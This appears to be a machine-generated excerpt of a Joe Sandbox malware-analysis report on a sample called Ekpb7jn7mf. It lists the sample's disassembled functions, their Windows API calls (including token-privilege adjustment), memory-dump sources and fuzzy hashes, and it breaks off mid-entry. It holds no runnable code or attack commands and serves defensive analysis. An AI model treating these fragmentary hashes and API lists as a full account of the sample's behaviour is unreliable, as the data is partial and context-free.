                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID:
                                                                                  • API String ID: 3398352648-0
                                                                                  • Opcode ID: ffeccf25956bfd93346b2d86616f67c4b85d78278941fcedc4f79907d0ffdda3
                                                                                  • Instruction ID: 5730f10ad350693b3656b398f843758227311bbc3d817beba93dcbd445191771
                                                                                  • Opcode Fuzzy Hash: ffeccf25956bfd93346b2d86616f67c4b85d78278941fcedc4f79907d0ffdda3
                                                                                  • Instruction Fuzzy Hash: DE011DB1600208BFDB209FA4ED89EAF7BBCEB04744F800076F902E1290D735CE659A35
                                                                                  Function 0040FF2D Relevance: 9.0, Strings: 7, Instructions: 289COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: XD$\D$tD$|D$|D$D$D
                                                                                  • API String ID: 0-3078164799
                                                                                  • Opcode ID: f36a09e5f26d8d62a54f4afe5aedbf896fa39a0e4924dd30a6198e919e352f8c
                                                                                  • Instruction ID: 8307f29fc7fc21a0a082ea922b051b0646981432ef55bab89a48cea2fea95e04
                                                                                  • Opcode Fuzzy Hash: f36a09e5f26d8d62a54f4afe5aedbf896fa39a0e4924dd30a6198e919e352f8c
                                                                                  • Instruction Fuzzy Hash: FAD14C72A0021ACFCF14CF58D880599B7B1FF8C308B2685ADE919AB341D731BA56CF94
                                                                                  Function 0040D007 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0040D02D
                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0042F0CC,?,?), ref: 0040D07A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  • API String ID: 2169056816-0
                                                                                  • Opcode ID: 804a2e1f4122a07eb972676116a6fd6af5b1b2391d4556cd137941413f2e30aa
                                                                                  • Instruction ID: ed338014c1c8d88939eefb6e2212735ed7d912fdd58134f1746a66ff11774296
                                                                                  • Opcode Fuzzy Hash: 804a2e1f4122a07eb972676116a6fd6af5b1b2391d4556cd137941413f2e30aa
                                                                                  • Instruction Fuzzy Hash: 85015E75610208AED720DFA4DC41BAAB3B8EF49714F408036BA48D7161D37498198B6D
                                                                                  Function 00411104 Relevance: 3.0, APIs: 2, Instructions: 20timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 00411111
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041111F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$System$File
                                                                                  • String ID:
                                                                                  • API String ID: 2838179519-0
                                                                                  • Opcode ID: 73c0fe710d69e9a8317a733d124d89beeb6e31e8a0860a5e8cfb29a734f86780
                                                                                  • Instruction ID: 59434568b1c2b5fc6a93c3db55aab0bab5b4963efa3a3d3351e5901167eda4be
                                                                                  • Opcode Fuzzy Hash: 73c0fe710d69e9a8317a733d124d89beeb6e31e8a0860a5e8cfb29a734f86780
                                                                                  • Instruction Fuzzy Hash: 6CE0E6B690020DAFCB10DF94D84A8DEBBFCEB48210F404465DD42E3301E630E655CBD5
                                                                                  Function 004146D4 Relevance: 2.0, APIs: 1, Instructions: 478COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _realloc
                                                                                  • String ID:
                                                                                  • API String ID: 1750794848-0
                                                                                  • Opcode ID: 83e84a8adc4c6bcc18e54cf14a6e0ef6e2350f436e9b7f199ea47aea8a84c61c
                                                                                  • Instruction ID: ccd42938f32d8140383a85433f03869281217cc3306c596cf6886b904b25083a
                                                                                  • Opcode Fuzzy Hash: 83e84a8adc4c6bcc18e54cf14a6e0ef6e2350f436e9b7f199ea47aea8a84c61c
                                                                                  • Instruction Fuzzy Hash: 8F02E4B1A106069BCB1DDF28C5816E9B7E1FF85304F20852ED556CBA84D338F9E1CB88
                                                                                  Function 00413C71 Relevance: 1.8, APIs: 1, Instructions: 267COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 8b445e2d0af184b95e2d68b27cf31678ff647875f71702221eff0f79dd89f91d
                                                                                  • Instruction ID: 7c45f5d2537cab61057ef223a39c2d6b2a97954d4784be44a639594692d6218a
                                                                                  • Opcode Fuzzy Hash: 8b445e2d0af184b95e2d68b27cf31678ff647875f71702221eff0f79dd89f91d
                                                                                  • Instruction Fuzzy Hash: 19A1FF71A00208EBDB04DF59C591BEDB7B5EB44305F20446FE806EB282CB799F86DB59
                                                                                  Function 00419925 Relevance: 1.6, APIs: 1, Instructions: 89comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(0042B188,00000000,00000001,0042B0D8,?), ref: 0041993E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: 51240b941610a78def0c35cfdd78c70d2fdaf1beb92afbb0e55c463cad22891a
                                                                                  • Instruction ID: f6ffd578f3a69ff9c0007d043678d94b5502af227f55d6373d15ec98f62652d0
                                                                                  • Opcode Fuzzy Hash: 51240b941610a78def0c35cfdd78c70d2fdaf1beb92afbb0e55c463cad22891a
                                                                                  • Instruction Fuzzy Hash: EB31D5B5600209EFCB04CFA4C899EAA7BB9EF49345B200499F9429B350C73AED51DB64
                                                                                  Function 0040C904 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: b82101085f311d5ff6f0195a33d3c8677c672b2327c7cf6ec3dc6be87143151e
                                                                                  • Instruction ID: 501842424769ff1faba8a2f973c04ad9dbb82eae3440be5a081cbe4827cf75c2
                                                                                  • Opcode Fuzzy Hash: b82101085f311d5ff6f0195a33d3c8677c672b2327c7cf6ec3dc6be87143151e
                                                                                  • Instruction Fuzzy Hash: A521F9B2A04645DFDB24DF29D48079EBBE49B19700F108A2FE496F73C1D678E9418749
                                                                                  Function 00409B26 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 00409B4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 323b664bac6b029254f741a14eb1960b5593a766be610192fc34cae7ccbd568a
                                                                                  • Instruction ID: 8c5665d2b5a010ee965aa838096fee94efe835068f1214688c479bddac91fd46
                                                                                  • Opcode Fuzzy Hash: 323b664bac6b029254f741a14eb1960b5593a766be610192fc34cae7ccbd568a
                                                                                  • Instruction Fuzzy Hash: CCF01D719001188FCB28CB18ED915D5B3F1F744314F5042B5D615D33D0D6B4AE81CF69
                                                                                  Function 0042327E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002323C), ref: 00423283
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 83b6a97849cf72bb80c7f5c4240ce15bd4f7ba8dbfae0b27471a2bbb2cf48466
                                                                                  • Instruction ID: 72b603c122315a7ab41933ea19eb4c364bde2c87d01a378921f78c7b6b2b8dbe
                                                                                  • Opcode Fuzzy Hash: 83b6a97849cf72bb80c7f5c4240ce15bd4f7ba8dbfae0b27471a2bbb2cf48466
                                                                                  • Instruction Fuzzy Hash: FD9002603511608746101B706D0A71565A05B69613FD558A1A441C4054DA9C8165552B
                                                                                  Function 0040497E Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: gj
                                                                                  • API String ID: 0-4203073231
                                                                                  • Opcode ID: 657123a7913344ab9a97147e8efb5658b1a5a6e789d1f0cda9d2c80b18b5b205
                                                                                  • Instruction ID: b2a9e86ee478ddf6d853b585b2e9c1939bccb96f7846b19d9b2cdb25fada05ce
                                                                                  • Opcode Fuzzy Hash: 657123a7913344ab9a97147e8efb5658b1a5a6e789d1f0cda9d2c80b18b5b205
                                                                                  • Instruction Fuzzy Hash: 4DC106B2D002289BDF44CF9AD8805DEFBB2BFC8310F6AC1A6D81577615D6346A528F91
                                                                                  Function 0040C3B1 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: uC
                                                                                  • API String ID: 0-1504446725
                                                                                  • Opcode ID: 349de8c0ae2f05400355cc0c855bfba9fe9dff50597b8f65b6f89c9216da9d24
                                                                                  • Instruction ID: cf5882200b297374fc74bf4f0d6c4e8219ce614918710f618014b0e146572498
                                                                                  • Opcode Fuzzy Hash: 349de8c0ae2f05400355cc0c855bfba9fe9dff50597b8f65b6f89c9216da9d24
                                                                                  • Instruction Fuzzy Hash: 0051E674804299AACB12CFA4C4D05FDBFB0EF59324F6941BFD8857B282C2357646CB94
                                                                                  Function 004169B4 Relevance: .8, Instructions: 835COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: a1192addd46f0d18085a054e2bb2681faa894532e111ec1e7ff070f4dd982f64
                                                                                  • Instruction ID: 00ab746b55baef28f9d77789ef054137b2c973a5cb05ccb9dd5712b5bc67d198
                                                                                  • Opcode Fuzzy Hash: a1192addd46f0d18085a054e2bb2681faa894532e111ec1e7ff070f4dd982f64
                                                                                  • Instruction Fuzzy Hash: 9972E270A047459FCB29CF24C5D06E9BBF1AF56308F15C4AED9969B342C738E985CB18
                                                                                  Function 00415B20 Relevance: .8, Instructions: 795COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c81f8e57a2910e075276bb5f51ce0f7dbecda6f6c9ae235e5be6403ef6b54daa
                                                                                  • Instruction ID: 365ced0154bef301e1740b44959b2e36be89c876cd5ae3469082627c7a4276d0
                                                                                  • Opcode Fuzzy Hash: c81f8e57a2910e075276bb5f51ce0f7dbecda6f6c9ae235e5be6403ef6b54daa
                                                                                  • Instruction Fuzzy Hash: 0C72BF70A04645DFCB19CF64C5806EDBBB1BF95308F28C1AED85A8B742D339E981CB59
                                                                                  Function 0041BA49 Relevance: .4, Instructions: 384COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                  • Instruction ID: 4e53e1b57dba2d85fbb61d74eac7bcfa6d40aa4561ce2722568cf5677455acbf
                                                                                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                  • Instruction Fuzzy Hash: 01D16073C4BAB3068735812D80681BBEA62AFD174131EC3E2DCD43F38DD62A5D9495D8
                                                                                  Function 0041B629 Relevance: .4, Instructions: 378COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                  • Instruction ID: 74460b6a6fd201c564fa156a5ed83951e3cafac44a98297fbe1dfad2048172a8
                                                                                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                  • Instruction Fuzzy Hash: DDD18373D1BAB3068735812D80581BBEE62AFD1B5031FC3E2DCE42F389D22A5D9595D8
                                                                                  Function 0041B21D Relevance: .4, Instructions: 361COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                  • Instruction ID: 814738f514a70d77c5989bb0947d1d48304f40bdd16a87f17d59f54d1cd8a7e1
                                                                                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                  • Instruction Fuzzy Hash: 56C17073C4BAB30A8736812D81581AFEA62AFD175031FC3E2CCE42F389923A5C9595D4
                                                                                  Function 0041AE49 Relevance: .4, Instructions: 351COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
